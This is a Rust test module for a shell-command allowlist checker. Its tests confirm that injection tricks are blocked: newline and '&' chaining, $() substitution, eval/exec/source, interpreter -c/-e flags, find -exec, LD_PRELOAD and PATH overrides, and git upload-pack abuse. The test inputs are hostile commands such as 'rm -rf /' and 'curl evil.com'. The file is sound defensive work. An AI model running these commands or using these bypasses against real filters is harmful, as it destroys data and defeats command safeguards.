1036        let defaults = crate::core::config::default_shell_allowlist();
1037        assert!(
1038            defaults.contains(&"pre-commit".to_string()),
1039            "pre-commit must be in default allowlist"
1040        );
1041    }
1042
1043    #[test]
1044    fn playwright_in_default_allowlist() {
1045        let defaults = crate::core::config::default_shell_allowlist();
1046        assert!(
1047            defaults.contains(&"playwright".to_string()),
1048            "playwright must be in default allowlist"
1049        );
1050    }
1051
1052    #[test]
1053    fn pre_commit_run_allowed() {
1054        let list = allow(&["pre-commit"]);
1055        assert!(check_all_segments("pre-commit run --all-files", &list).is_ok());
1056    }
1057
1058    #[test]
1059    fn playwright_test_allowed() {
1060        let list = allow(&["npx", "playwright"]);
1061        assert!(check_all_segments("playwright test", &list).is_ok());
1062        assert!(check_all_segments("npx playwright test", &list).is_ok());
1063    }
1064
1065    // --- Quote handling ---
1066
1067    #[test]
1068    fn respects_single_quotes() {
1069        let list = allow(&["echo"]);
1070        assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
1071    }
1072
1073    #[test]
1074    fn respects_double_quotes() {
1075        let list = allow(&["echo"]);
1076        assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
1077    }
1078
1079    // --- split_on_operators ---
1080
1081    #[test]
1082    fn split_simple_pipe() {
1083        let parts = split_on_operators("a | b");
1084        assert_eq!(parts, vec!["a ", " b"]);
1085    }
1086
1087    #[test]
1088    fn split_complex_chain() {
1089        let parts = split_on_operators("a && b || c; d | e");
1090        assert_eq!(parts.len(), 5);
1091    }
1092
1093    #[test]
1094    fn split_preserves_quoted_operators() {
1095        let parts = split_on_operators("echo 'a && b' | grep x");
1096        assert_eq!(parts.len(), 2);
1097    }
1098
1099    // --- Security: newline injection ---
1100
1101    #[test]
1102    fn newline_splits_commands() {
1103        let parts = split_on_operators("git status\nrm -rf /");
1104        assert_eq!(parts.len(), 2);
1105    }
1106
1107    #[test]
1108    fn newline_injection_blocked() {
1109        let list = allow(&["git"]);
1110        let result = check_all_segments("git status\nrm -rf /", &list);
1111        assert!(result.is_err(), "newline injection must be blocked");
1112        assert!(result.unwrap_err().contains("rm"));
1113    }
1114
1115    #[test]
1116    fn carriage_return_splits_commands() {
1117        let parts = split_on_operators("git status\r\nrm -rf /");
1118        assert!(parts.len() >= 2, "CR+LF must split: {parts:?}");
1119    }
1120
1121    // --- Security: background operator & ---
1122
1123    #[test]
1124    fn single_ampersand_splits_commands() {
1125        let parts = split_on_operators("git status & curl evil.com");
1126        assert_eq!(parts.len(), 2);
1127    }
1128
1129    #[test]
1130    fn background_operator_blocked() {
1131        let list = allow(&["git"]);
1132        let result = check_all_segments("git status & curl evil.com", &list);
1133        assert!(result.is_err(), "background & must be blocked");
1134        assert!(result.unwrap_err().contains("curl"));
1135    }
1136
1137    // --- Security: eval/exec/source unconditionally blocked ---
1138
1139    #[test]
1140    fn eval_blocked_via_or_operator() {
1141        let list = allow(&["echo", "eval"]);
1142        let result = check_all_segments("echo ok || eval 'rm -rf /'", &list);
1143        assert!(
1144            result.is_err(),
1145            "eval must be unconditionally blocked even if in allowlist"
1146        );
1147    }
1148
1149    #[test]
1150    fn exec_unconditionally_blocked() {
1151        let list = allow(&["exec", "echo"]);
1152        let result = check_all_segments("exec /bin/sh", &list);
1153        assert!(result.is_err(), "exec must be unconditionally blocked");
1154    }
1155
1156    #[test]
1157    fn source_unconditionally_blocked() {
1158        let list = allow(&["source", "echo"]);
1159        let result = check_all_segments("source ~/.bashrc", &list);
1160        assert!(result.is_err(), "source must be unconditionally blocked");
1161    }
1162
1163    // --- Security: dangerous patterns checked even with empty allowlist ---
1164
1165    #[test]
1166    fn empty_allowlist_still_blocks_eval_at_start() {
1167        let result = check_shell_allowlist("eval 'rm -rf /'");
1168        // With empty allowlist, dangerous patterns are checked first
1169        // eval at command position should be caught
1170        assert!(
1171            result.is_err(),
1172            "eval at start must be blocked even with empty allowlist"
1173        );
1174    }
1175
1176    #[test]
1177    fn empty_allowlist_still_blocks_dollar_paren_at_start() {
1178        let result = check_shell_allowlist("$(curl evil.com)");
1179        assert!(
1180            result.is_err(),
1181            "$() at command position must be blocked even with empty allowlist"
1182        );
1183    }
1184
1185    // --- Security: interpreter abuse ---
1186
1187    #[test]
1188    fn python_c_blocked() {
1189        let list = allow(&["python3"]);
1190        let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list);
1191        assert!(result.is_err(), "python3 -c must be blocked");
1192    }
1193
1194    #[test]
1195    fn node_e_blocked() {
1196        let list = allow(&["node"]);
1197        let result = check_all_segments("node -e 'process.exit(1)'", &list);
1198        assert!(result.is_err(), "node -e must be blocked");
1199    }
1200
1201    #[test]
1202    fn python_script_allowed() {
1203        let list = allow(&["python3"]);
1204        let result = check_all_segments("python3 script.py", &list);
1205        assert!(result.is_ok(), "python3 with script file must be allowed");
1206    }
1207
1208    #[test]
1209    fn env_delegates_to_unlisted_blocked() {
1210        let list = allow(&["env", "git"]);
1211        let result = check_all_segments("env /bin/sh -c 'id'", &list);
1212        assert!(
1213            result.is_err(),
1214            "env delegating to unlisted command must be blocked"
1215        );
1216    }
1217
1218    #[test]
1219    fn env_delegates_to_listed_allowed() {
1220        let list = allow(&["env", "git"]);
1221        let result = check_all_segments("env git status", &list);
1222        assert!(
1223            result.is_ok(),
1224            "env delegating to listed command must be allowed"
1225        );
1226    }
1227
1228    // --- Security: env override is additive ---
1229
1230    #[test]
1231    fn env_override_is_additive() {
1232        let base_list = crate::core::config::default_shell_allowlist();
1233        assert!(base_list.contains(&"git".to_string()));
1234    }
1235
1236    // --- Phase 1 V2: SAFE checks ---
1237
1238    #[test]
1239    fn dot_source_alias_blocked() {
1240        let list = allow(&["echo"]);
1241        let result = check_all_segments(". ~/.bashrc", &list);
1242        assert!(result.is_err(), ". (source alias) must be blocked");
1243    }
1244
1245    #[test]
1246    fn backslash_newline_normalized() {
1247        let normalized = normalize_line_continuations("echo ok && \\\ncurl evil");
1248        assert!(
1249            !normalized.contains('\n'),
1250            "backslash-newline must be removed"
1251        );
1252        assert!(
1253            normalized.contains("curl"),
1254            "content after continuation must be preserved"
1255        );
1256    }
1257
1258    #[test]
1259    fn delegation_recursive_interpreter_check() {
1260        let list = allow(&["env", "python3"]);
1261        let result = check_all_segments("env python3 -c 'import os'", &list);
1262        assert!(
1263            result.is_err(),
1264            "env python3 -c must be blocked via recursive check"
1265        );
1266    }
1267
1268    #[test]
1269    fn delegation_recursive_normal_allowed() {
1270        let list = allow(&["env", "git"]);
1271        let result = check_all_segments("env git status", &list);
1272        assert!(result.is_ok(), "env git status must be allowed");
1273    }
1274
1275    #[test]
1276    fn eval_flags_extended_r() {
1277        let list = allow(&["php"]);
1278        let result = check_all_segments("php -r 'system(\"id\")'", &list);
1279        assert!(result.is_err(), "php -r must be blocked");
1280    }
1281
1282    #[test]
1283    fn eval_flags_extended_p() {
1284        let list = allow(&["node"]);
1285        let result = check_all_segments("node -p 'process.exit(1)'", &list);
1286        assert!(result.is_err(), "node -p must be blocked");
1287    }
1288
1289    #[test]
1290    fn combined_flags_pe_blocked() {
1291        let list = allow(&["perl"]);
1292        let result = check_all_segments("perl -pe 's/foo/bar/'", &list);
1293        assert!(result.is_err(), "perl -pe must be blocked (combined flag)");
1294    }
1295
1296    #[test]
1297    fn combined_flags_ne_blocked() {
1298        let list = allow(&["perl"]);
1299        let result = check_all_segments("perl -ne 'print'", &list);
1300        assert!(result.is_err(), "perl -ne must be blocked (combined flag)");
1301    }
1302
1303    #[test]
1304    fn heredoc_to_interpreter_blocked() {
1305        let list = allow(&["python3"]);
1306        let result = check_all_segments("python3 <<'EOF'", &list);
1307        assert!(result.is_err(), "heredoc to interpreter must be blocked");
1308    }
1309
1310    #[test]
1311    fn python_script_file_still_allowed() {
1312        let list = allow(&["python3"]);
1313        assert!(check_all_segments("python3 script.py", &list).is_ok());
1314        assert!(check_all_segments("python3 -u script.py", &list).is_ok());
1315    }
1316
1317    #[test]
1318    fn bare_interpreter_detection() {
1319        assert!(is_bare_interpreter_stdin("python3"));
1320        assert!(is_bare_interpreter_stdin("python3 -u"));
1321        assert!(!is_bare_interpreter_stdin("python3 script.py"));
1322        assert!(!is_bare_interpreter_stdin("python3 -u script.py"));
1323    }
1324
1325    // --- Phase 1 V2: WARN-FIRST checks (default = command passes through) ---
1326
1327    #[test]
1328    fn dollar_paren_in_args_passes_by_default() {
1329        let list = allow(&["echo", "git", "cat"]);
1330        assert!(
1331            check_all_segments("echo $(whoami)", &list).is_ok(),
1332            "$() in args must still pass when shell_strict_mode=false (default)"
1333        );
1334    }
1335
1336    #[test]
1337    fn backticks_in_args_passes_by_default() {
1338        let list = allow(&["echo"]);
1339        assert!(
1340            check_all_segments("echo `date`", &list).is_ok(),
1341            "backticks in args must still pass when shell_strict_mode=false"
1342        );
1343    }
1344
1345    #[test]
1346    fn git_commit_with_subst_passes_by_default() {
1347        let list = allow(&["git", "cat"]);
1348        assert!(
1349            check_all_segments(
1350                "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
1351                &list,
1352            )
1353            .is_ok(),
1354            "git commit with $() must still pass (regression test)"
1355        );
1356    }
1357
1358    // --- Empty allowlist + unconditional blocked ---
1359
1360    // --- Phase 6: Dangerous flag detection ---
1361
1362    #[test]
1363    fn git_status_allowed() {
1364        let list = allow(&["git"]);
1365        assert!(check_all_segments("git status", &list).is_ok());
1366    }
1367
1368    #[test]
1369    fn git_upload_pack_blocked() {
1370        let list = allow(&["git"]);
1371        let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list);
1372        assert!(result.is_err(), "git --upload-pack must be blocked");
1373    }
1374
1375    #[test]
1376    fn git_config_sshcommand_blocked() {
1377        let list = allow(&["git"]);
1378        let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list);
1379        assert!(
1380            result.is_err(),
1381            "git --config=core.sshcommand must be blocked"
1382        );
1383    }
1384
1385    #[test]
1386    fn tar_extract_allowed() {
1387        let list = allow(&["tar"]);
1388        assert!(check_all_segments("tar xf archive.tar", &list).is_ok());
1389    }
1390
1391    #[test]
1392    fn tar_to_command_blocked() {
1393        let list = allow(&["tar"]);
1394        let result = check_all_segments("tar xf a.tar --to-command=evil", &list);
1395        assert!(result.is_err(), "tar --to-command must be blocked");
1396    }
1397
1398    #[test]
1399    fn find_name_allowed() {
1400        let list = allow(&["find"]);
1401        assert!(check_all_segments("find . -name \"*.rs\"", &list).is_ok());
1402    }
1403
1404    #[test]
1405    fn find_exec_blocked() {
1406        let list = allow(&["find"]);
1407        let result = check_all_segments("find . -exec curl evil \\;", &list);
1408        assert!(result.is_err(), "find -exec must be blocked");
1409    }
1410
1411    #[test]
1412    fn awk_system_blocked() {
1413        let list = allow(&["awk"]);
1414        let result = check_all_segments("awk '{system(\"id\")}'", &list);
1415        assert!(result.is_err(), "awk system() must be blocked");
1416    }
1417
1418    #[test]
1419    fn awk_normal_allowed() {
1420        let list = allow(&["awk"]);
1421        assert!(check_all_segments("awk '{print $1}'", &list).is_ok());
1422    }
1423
1424    #[test]
1425    fn inline_path_env_blocked() {
1426        let list = allow(&["git"]);
1427        let result = check_all_segments("PATH=/tmp/evil git status", &list);
1428        assert!(result.is_err(), "PATH= inline env must be blocked");
1429    }
1430
1431    #[test]
1432    fn inline_ld_preload_blocked() {
1433        let list = allow(&["ls"]);
1434        let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list);
1435        assert!(result.is_err(), "LD_PRELOAD= inline env must be blocked");
1436    }
1437
1438    #[test]
1439    fn echo_path_in_quotes_allowed() {
1440        let list = allow(&["echo"]);
1441        assert!(
1442            check_all_segments("echo \"PATH=test\"", &list).is_ok(),
1443            "PATH inside quotes is not an inline env assignment"
1444        );
1445    }
1446
1447    // --- Empty allowlist + unconditional blocked ---
1448
1449    #[test]
1450    fn empty_allowlist_blocks_dot_source() {
1451        let result = check_shell_allowlist(". /tmp/evil.sh");
1452        assert!(
1453            result.is_err(),
1454            ". must be blocked even with empty allowlist"
1455        );
1456    }
1457
1458    #[test]
1459    fn unicode_line_separators_normalized() {
1460        let normalized = normalize_line_continuations("echo ok\u{2028}curl evil");
1461        assert!(
1462            normalized.contains('\n'),
1463            "U+2028 must be normalized to newline"
1464        );
1465    }
1466
1467    #[test]
1468    fn unicode_paragraph_separator_normalized() {
1469        let normalized = normalize_line_continuations("echo ok\u{2029}curl evil");
1470        assert!(
1471            normalized.contains('\n'),
1472            "U+2029 must be normalized to newline"
1473        );
1474    }
1475
1476    #[test]
1477    fn empty_allowlist_blocks_exec() {
1478        let result = check_shell_allowlist("exec /bin/sh");
1479        assert!(
1480            result.is_err(),
1481            "exec must be blocked even with empty allowlist"
1482        );
1483    }
1484
1485    // --- shell_tokenize tests ---
1486
1487    #[test]
1488    fn tokenize_simple() {
1489        assert_eq!(shell_tokenize("git status"), vec!["git", "status"]);
1490    }
1491
1492    #[test]
1493    fn tokenize_double_quoted_path_with_spaces() {
1494        let tokens = shell_tokenize(r#"git -C "Program Files/repo" status"#);
1495        assert_eq!(tokens, vec!["git", "-C", "Program Files/repo", "status"]);
1496    }
1497
1498    #[test]
1499    fn tokenize_single_quoted_windows_path() {
1500        let tokens = shell_tokenize(r"git -C 'C:\Program Files\repo' status");
1501        assert_eq!(
1502            tokens,
1503            vec!["git", "-C", r"C:\Program Files\repo", "status"]
1504        );
1505    }
1506
1507    #[test]
1508    fn tokenize_single_quoted() {
1509        let tokens = shell_tokenize("echo 'hello world' done");
1510        assert_eq!(tokens, vec!["echo", "hello world", "done"]);
1511    }
1512
1513    #[test]
1514    fn tokenize_backslash_escape() {
1515        let tokens = shell_tokenize(r"echo hello\ world");
1516        assert_eq!(tokens, vec!["echo", "hello world"]);
1517    }
1518
1519    #[test]
1520    fn tokenize_empty() {
1521        assert!(shell_tokenize("").is_empty());
1522        assert!(shell_tokenize("   ").is_empty());
1523    }
1524
1525    #[test]
1526    fn tokenize_mixed_quotes() {
1527        let tokens = shell_tokenize(r#"cmd "arg one" 'arg two' arg3"#);
1528        assert_eq!(tokens, vec!["cmd", "arg one", "arg two", "arg3"]);
1529    }
1530
1531    // --- quote_aware_token_end tests ---
1532
1533    #[test]
1534    fn token_end_simple() {
1535        assert_eq!(quote_aware_token_end("foo bar"), 3);
1536    }
1537
1538    #[test]
1539    fn token_end_double_quoted() {
1540        assert_eq!(quote_aware_token_end(r#""foo bar" baz"#), 9);
1541    }
1542
1543    #[test]
1544    fn token_end_single_quoted() {
1545        assert_eq!(quote_aware_token_end("'foo bar' baz"), 9);
1546    }
1547
1548    #[test]
1549    fn token_end_entire_string() {
1550        assert_eq!(quote_aware_token_end("foobar"), 6);
1551    }
1552
1553    #[test]
1554    fn token_end_env_with_quoted_value() {
1555        assert_eq!(quote_aware_token_end(r#"FOO="bar baz" git"#), 13);
1556    }
1557
1558    // --- skip_env_assignments with quoted values ---
1559
1560    #[test]
1561    fn skip_env_quoted_value_with_spaces() {
1562        let result = skip_env_assignments(r#"FOO="bar baz" git status"#);
1563        assert_eq!(result.trim(), "git status");
1564    }
1565
1566    #[test]
1567    fn skip_env_multiple_assignments() {
1568        let result = skip_env_assignments(r#"A=1 B="two three" cargo test"#);
1569        assert_eq!(result.trim(), "cargo test");
1570    }
1571
1572    // --- extract_base_from_segment with quoted commands ---
1573
1574    #[test]
1575    fn extract_base_quoted_path() {
1576        let r = extract_base_from_segment(r#""/usr/local/bin/git" status"#);
1577        assert_eq!(r, "git");
1578    }
1579
1580    // --- security checks with quoted paths ---
1581
1582    #[test]
1583    fn interpreter_check_with_quoted_path() {
1584        let list = allow(&["python3"]);
1585        let r = check_all_segments(r#"python3 "/path/with spaces/script.py""#, &list);
1586        assert!(r.is_ok(), "quoted path to script should be allowed");
1587    }
1588
1589    #[test]
1590    fn dangerous_flags_git_quoted_path() {
1591        let list = allow(&["git"]);
1592        let r = check_all_segments(r#"git -C "C:\Program Files\repo" status"#, &list);
1593        assert!(r.is_ok(), "git -C with quoted path should be allowed");
1594    }
1595}
lean_ctx/core/shell_allowlist.rs

lean_ctx/core/
shell_allowlist.rs